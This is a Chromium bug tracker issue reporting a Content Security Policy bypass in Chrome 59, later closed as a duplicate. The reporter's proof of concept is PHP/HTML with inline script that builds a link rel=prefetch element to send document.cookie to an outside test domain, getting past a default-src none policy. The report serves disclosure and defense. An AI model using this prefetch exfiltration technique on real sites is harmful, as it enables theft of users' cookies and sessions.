New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 719242 link

Starred by 1 user
Status: Duplicate
Merged: issue 663620
Owner:
mkwst@chromium.org
Buried. Ping if important.
Closed: Jun 2017
Components:
EstimatedDays: ----
NextAction: ----
OS: Mac
Pri: 2
Type: Bug



Sign in to add a comment

Bypass of CSP unsafe-inline mode in Blink.

Reported by evi1m0.bat@gmail.com, May 7 2017 
UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.36 Safari/537.36

Steps to reproduce the problem:
We can see intercept requests and bypass requests.

PoC: http://server.n0tr00t.com/chrome/csp31.php

[evi1m0@iZj6c8vaac87t4nyobq3r9Z chrome]# cat csp31.php
<html>
<head>
    <meta charset="utf8">
    <title>Chrome59 CSP unsafe-inline bypass</title>
    <?php
    header("Content-Security-Policy: default-src none 'unsafe-inline'; report-uri /test-csp-reports");
    ?>
    <style>
    textarea {
        margin: 0px;
        width: 414px;
        height: 185px;
    }
    </style>
</head>
<body>
<h3>documentcookie --> evil.com</h3>
<a href="https://ws1.sinaimg.cn/large/c334041bgy1ffd69uur7ij20ub08oq5a.jpg" target="_blank">
https://ws1.sinaimg.cn/large/c334041bgy1ffd69uur7ij20ub08oq5a.jpg
</a>
<hr>
<textarea>
Web source:

    header("Content-Security-Policy: default-src none 'unsafe-inline'; report-uri /test-csp-reports");

    <link rel="preload" href="//linux.im/styles/other.css">

    <script>
        n0t = document.body.appendChild(document.createElement("link"));
        n0t.setAttribute("rel", "prefetch");
        n0t.setAttribute("href", "//1J38ax.chrome59.test.n0tr00t.com/?" + document.cookie);
    </script>
</textarea>

<!-- testcode -->
<link rel="preload" href="//linux.im/styles/other.css">
<script>
    document.cookie = "csp=" + escape("SECUREKEY@^#(!@#(&*(@#!") + ";";
    n0t = document.body.appendChild(document.createElement("link"));
    n0t.setAttribute("rel", "prefetch");
    n0t.setAttribute("href", "//1J38ax.chrome59.test.n0tr00t.com/?" + document.cookie);
</script>
<!-- testend -->
</body>
</html>

What is the expected behavior?

What went wrong?
Bypass CSP

Did this work before? N/A 

Chrome version: 59.0.3071.36  Channel: beta
OS Version: OS X 10.12.4
Flash Version: Shockwave Flash 25.0 r0

Comment 1 by tkent@chromium.org, May 7 2017

Components: -Blink Blink>SecurityFeature

Comment 2 by ranjitkan@chromium.org, May 12 2017

Labels: Needs-Triage-M59

Comment 3 by mkwst@chromium.org, Jun 19 2017

Components: -Blink>SecurityFeature Blink>SecurityFeature>ContentSecurityPolicy
Mergedinto: 663620
Owner: mkwst@chromium.org
Status: Duplicate (was: Unconfirmed)
Duping this against https://bugs.chromium.org/p/chromium/issues/detail?id=663620#c2. If you have opinions about whether or not CSP ought to control `prefetch` requests, I'd suggest hopping over to https://github.com/w3c/webappsec-csp/issues/107 to comment.

Sign in to add a comment